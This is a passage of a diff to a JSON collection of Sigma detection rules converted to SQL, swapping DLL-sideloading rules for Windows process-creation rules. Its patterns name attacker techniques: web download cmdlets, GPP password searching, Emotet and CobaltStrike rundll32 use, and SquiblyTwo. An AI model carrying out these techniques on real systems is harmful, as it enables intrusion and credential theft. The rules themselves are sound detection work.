'%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System%' ESCAPE '\\' AND (CommandLine LIKE '%GroupPolicyRefreshTimeDC%' ESCAPE '\\' OR CommandLine LIKE '%GroupPolicyRefreshTimeOffsetDC%' ESCAPE '\\' OR CommandLine LIKE '%GroupPolicyRefreshTime%' ESCAPE '\\' OR CommandLine LIKE '%GroupPolicyRefreshTimeOffset%' ESCAPE '\\' OR CommandLine LIKE '%EnableSmartScreen%' ESCAPE '\\' OR CommandLine LIKE '%ShellSmartScreenLevel%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_jsschhlp.yml" + "filename": "proc_creation_win_reg_modify_group_policy_settings.yml" }, { - "title": "Fax Service DLL Search Order Hijack", - "id": "828af599-4c53-4ed2-ba4a-a9f835c434ea", + "title": "Whoami Utility Execution", + "id": "e28a5a99-da44-436d-b7a0-2afc20a5f413", "status": "test", - "description": "The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.", - "author": "NVISO", + "description": "Detects the execution of whoami, which is often used by attackers after exploitation / privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1574.001", - "attack.t1574.002" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Unlikely" + "Admin activity", + "Scripts and administrative tools used in the monitored environment", + "Monitoring activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\fxssvc.exe' ESCAPE '\\' AND ImageLoaded LIKE '%ualapi.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe'))" ], - "filename": "image_load_side_load_ualapi.yml" + "filename": "proc_creation_win_whoami_execution.yml" }, { - "title": "Microsoft Office DLL Sideload", - "id": "829a3bdf-34da-4051-9cf4-8ed221a8ae4f", + "title": "Suspicious Rundll32 Without Any CommandLine Params", + "id": "1775e15e-b61b-4d14-a1a3-80981298085a", "status": "experimental", - "description": "Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "description": "Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1202" ], "falsepositives": [ - "Unlikely" + "Possible but rare" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\outllib.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\')))" - ], - "filename": "image_load_side_load_office_dlls.yml" - }, - { - "title": "PowerShell Core DLL Loaded By Non PowerShell Process", - "id": "092bc4b9-3d1d-43b4-a6b4-8c8acd83522f", - "status": "experimental", - "description": "Detects loading of essential DLLs used by PowerShell, but not by the process powershell.exe. Detects behaviour similar to meterpreter's \"load powershell\" extension.", - "author": "Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton", - "tags": [ - "attack.t1059.001", - "attack.execution" - ], - "falsepositives": [ - "Used by some .NET binaries, minimal on user workstation.", - "Used by Microsoft SQL Server Management Studio" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\System.Management.Automation.Dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\System.Management.Automation.ni.Dll' ESCAPE '\\') AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\dsac.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WINDOWS\\\\System32\\\\sdiagnhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WINDOWS\\\\System32\\\\RemoteFXvGPUDisablement.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sqlps.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winrshost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\syncappvpublishingserver.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\runscripthelper.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ServerManager.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft SQL Server Management Studio %\\\\Common%\\\\IDE\\\\Ssms.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\IDE\\\\devenv.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ServiceHub.VSDetouredHost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ServiceHub.SettingsHost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ServiceHub.Host.CLR.x86.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Citrix\\\\ConfigSync\\\\ConfigSyncRun.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor.exe' ESCAPE '\\')) OR (NewProcessName = '')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NOT ((ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\'))))" ], - "filename": "image_load_dll_system_management_automation_susp_load.yml" + "filename": "proc_creation_win_rundll32_no_params.yml" }, { - "title": "Suspicious Volume Shadow Copy Vsstrace.dll Load", - "id": "48bfd177-7cf2-412b-ad77-baf923489e82", - "status": "experimental", - "description": "Detects the image load of VSS DLL by uncommon executables", - "author": "frack113", + "title": "Potential Emotet Rundll32 Execution", + "id": "54e57ce3-0672-46eb-a402-2c0948d5e3e9", + "status": "test", + "description": "Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL", + "author": "FPT.EagleEye", "tags": [ "attack.defense_evasion", - "attack.impact", - "attack.t1490" + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,RunDLL' ESCAPE '\\' OR CommandLine LIKE '%,Control\\_RunDLL' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%.dll,Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll\",Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll'',Control\\_RunDLL' ESCAPE '\\')) OR (ParentProcessName LIKE '%\\\\tracker.exe' ESCAPE '\\')))" ], - "filename": "image_load_dll_vsstrace_susp_load.yml" + "filename": "proc_creation_win_malware_emotet_rundll32_execution.yml" }, { - "title": "Potential DLL Sideloading Via ClassicExplorer32.dll", - "id": "caa02837-f659-466f-bca6-48bde2826ab4", - "status": "experimental", - "description": "Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software", - "author": "frack113", + "title": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl", + "id": "074e0ded-6ced-4ebd-8b4d-53f55908119d", + "status": "test", + "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", + "author": "Julia Fomina, oscd.community", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1216" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\ClassicExplorer32.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\Classic Shell\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%winrm%' ESCAPE '\\' AND (CommandLine LIKE '%format:pretty%' ESCAPE '\\' OR CommandLine LIKE '%format:\"pretty\"%' ESCAPE '\\' OR CommandLine LIKE '%format:\"text\"%' ESCAPE '\\' OR CommandLine LIKE '%format:text%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_classicexplorer32.yml" + "filename": "proc_creation_win_winrm_awl_bypass.yml" }, { - "title": "Pingback Backdoor DLL Loading Activity", - "id": "35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b", - "status": "experimental", - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "author": "Bhabesh Raj", + "title": "Usage Of Web Request Commands And Cmdlets", + "id": "9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d", + "status": "test", + "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine", + "author": "James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger", "tags": [ - "attack.persistence", - "attack.t1574.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\msdtc.exe' ESCAPE '\\' AND ImageLoaded LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%Net.WebClient%' ESCAPE '\\' OR CommandLine LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%Resume-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%[System.Net.WebRequest]::create%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RestMethod%' ESCAPE '\\' OR CommandLine LIKE '%WinHttp.WinHttpRequest%' ESCAPE '\\'))" ], - "filename": "image_load_malware_pingback_backdoor.yml" + "filename": "proc_creation_win_susp_web_request_cmd_and_cmdlets.yml" }, { - "title": "WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load", - "id": "b439f47d-ef52-4b29-9a2f-57d8a96cb6b8", - "status": "test", - "description": "Detects signs of the WMI script host process \"scrcons.exe\" loading scripting DLLs which could indciates WMI ActiveScriptEventConsumers EventConsumers activity.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Suspicious Sigverif Execution", + "id": "7d4aaec2-08ed-4430-8b96-28420e030e04", + "status": "experimental", + "description": "Detects the execution of sigverif binary as a parent process which could indicate it being used as a LOLBIN to proxy execution", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.003" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ - "Legitimate event consumers", - "Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\vbscript.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemdisp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshom.ocx' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scrrun.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\sigverif.exe' ESCAPE '\\')" ], - "filename": "image_load_scrcons_wmi_scripteventconsumer.yml" + "filename": "proc_creation_win_lolbin_sigverif.yml" }, { - "title": "Third Party Software DLL Sideloading", - "id": "f9df325d-d7bc-4a32-8a1a-2cc61dcefc63", + "title": "Suspicious Workstation Locking via Rundll32", + "id": "3b5b0213-0460-4e3f-8937-3abf98ff7dcc", "status": "experimental", - "description": "Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "description": "Detects a suspicious call to the user32.dll function that locks the user workstation", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Scripts or links on the user desktop used to lock the workstation instead of Windows+L or the menu option" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\commfunc.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE '%\\\\AppData\\\\local\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\'))) OR (ImageLoaded LIKE '%\\\\tosbtkbd.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Toshiba\\\\Bluetooth Toshiba Stack\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Toshiba\\\\Bluetooth Toshiba Stack\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%user32.dll,%' ESCAPE '\\' AND CommandLine LIKE '%LockWorkStation%' ESCAPE '\\')" ], - "filename": "image_load_side_load_third_party.yml" + "filename": "proc_creation_win_rundll32_user32_dll.yml" }, { - "title": "WMI Persistence - Command Line Event Consumer", - "id": "05936ce2-ee05-4dae-9d03-9a391cf2d2c6", + "title": "Findstr GPP Passwords", + "id": "91a2c315-9ee6-4052-a853-6f6a8238f90d", "status": "test", - "description": "Detects WMI command line event consumers", - "author": "Thomas Patzke", + "description": "Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.", + "author": "frack113", "tags": [ - "attack.t1546.003", - "attack.persistence" + "attack.credential_access", + "attack.t1552.006" ], "falsepositives": [ - "Unknown (data set is too small; further testing needed)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbemcons.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (CommandLine LIKE '%cpassword%' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.xml%' ESCAPE '\\'))" ], - "filename": "image_load_wmi_persistence_commandline_event_consumer.yml" + "filename": "proc_creation_win_findstr_gpp_passwords.yml" }, { - "title": "VBA DLL Loaded Via Office Application", - "id": "e6ce8457-68b1-485b-9bdd-3c2b5d679aa9", + "title": "Remote Access Tool - GoToAssist Execution", + "id": "b6d98a4f-cef0-4abf-bbf6-24132854a83d", "status": "test", - "description": "Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros.", - "author": "Antonlovesdnb", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND (ImageLoaded LIKE '%\\\\VBE7.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBEUI.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\VBE7INTL.DLL' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'GoTo Opener' OR Product = 'GoTo Opener' OR Company = 'LogMeIn, Inc.'))" ], - "filename": "image_load_office_vbadll_load.yml" + "filename": "proc_creation_win_remote_access_tools_gotoopener.yml" }, { - "title": "Suspicious Volume Shadow Copy Vssapi.dll Load", - "id": "37774c23-25a1-4adb-bb6d-8bb9fd59c0f8", - "status": "experimental", - "description": "Detects the image load of VSS DLL by uncommon executables", - "author": "frack113", + "title": "Potential SquiblyTwo Technique Execution", + "id": "8d63dadf-b91b-4187-87b6-34a1114577ea", + "status": "test", + "description": "Detects potential SquiblyTwo attack technique with possible renamed WMIC via Imphash and OriginalFileName fields", + "author": "Markus Neis, Florian Roth", "tags": [ "attack.defense_evasion", - "attack.impact", - "attack.t1490" + "attack.t1047", + "attack.t1220", + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\ProgramData\\\\Package Cache\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe' OR Imphash IN ('1B1A3F43BF37B5BFE60751F2EE2F326E', '37777A96245A3C74EB217308F3546F4C', '9D87C9D67CE724033C0B40CC4CA1B206') OR (Hashes LIKE '%IMPHASH=1B1A3F43BF37B5BFE60751F2EE2F326E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=37777A96245A3C74EB217308F3546F4C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9D87C9D67CE724033C0B40CC4CA1B206%' ESCAPE '\\')) AND (CommandLine LIKE '%format:%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\'))" ], - "filename": "image_load_dll_vssapi_susp_load.yml" + "filename": "proc_creation_win_wmic_squiblytwo_bypass.yml" }, { - "title": "Potential DLL Sideloading Via VMware Xfer", - "id": "9313dc13-d04c-46d8-af4a-a930cc55d93b", - "status": "experimental", - "description": "Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Spool Service Child Process", + "id": "dcdbc940-0bff-46b2-95f3-2d73f848e33b", + "status": "test", + "description": "Detects suspicious print spool service (spoolsv.exe) child processes.", + "author": "Justin C. (@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.execution", + "attack.t1203", + "attack.privilege_escalation", + "attack.t1068" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\VMwareXferlogs.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\glib-2.0.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\VMware\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND IntegrityLevel = 'System') AND ((((((NewProcessName LIKE '%\\\\gpupdate.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskmgr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wget.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cipher.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\write.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%start%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.spl%' ESCAPE '\\' OR CommandLine LIKE '%route add%' ESCAPE '\\' OR CommandLine LIKE '%program files%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%add portopening%' ESCAPE '\\' OR CommandLine LIKE '%rule name%' ESCAPE '\\')))) OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%.spl%' ESCAPE '\\'))) OR ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\')))" ], - "filename": "image_load_side_load_vmware_xfer.yml" + "filename": "proc_creation_win_spoolsv_susp_child_processes.yml" }, { - "title": "Aruba Network Service Potential DLL Sideloading", - "id": "90ae0469-0cee-4509-b67f-e5efcef040f7", + "title": "Schtasks Creation Or Modification With SYSTEM Privileges", + "id": "89ca78fd-b37c-4310-b3d3-81a023f83936", "status": "experimental", - "description": "Detects potential DLL sideloading activity via the Aruba Networks Virtual Intranet Access \"arubanetsvc.exe\" process using DLL Search Order Hijacking", + "description": "Detects the creation or update of a scheduled task to run with \"NT AUTHORITY\\SYSTEM\" privileges", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", + "attack.execution", "attack.persistence", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\arubanetsvc.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcr100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp100.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iphlpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpapi.dll' ESCAPE '\\')) AND NOT ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND (CommandLine LIKE '% /change %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\') AND CommandLine LIKE '%/ru %' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\') OR ((CommandLine LIKE '%/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR %' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files 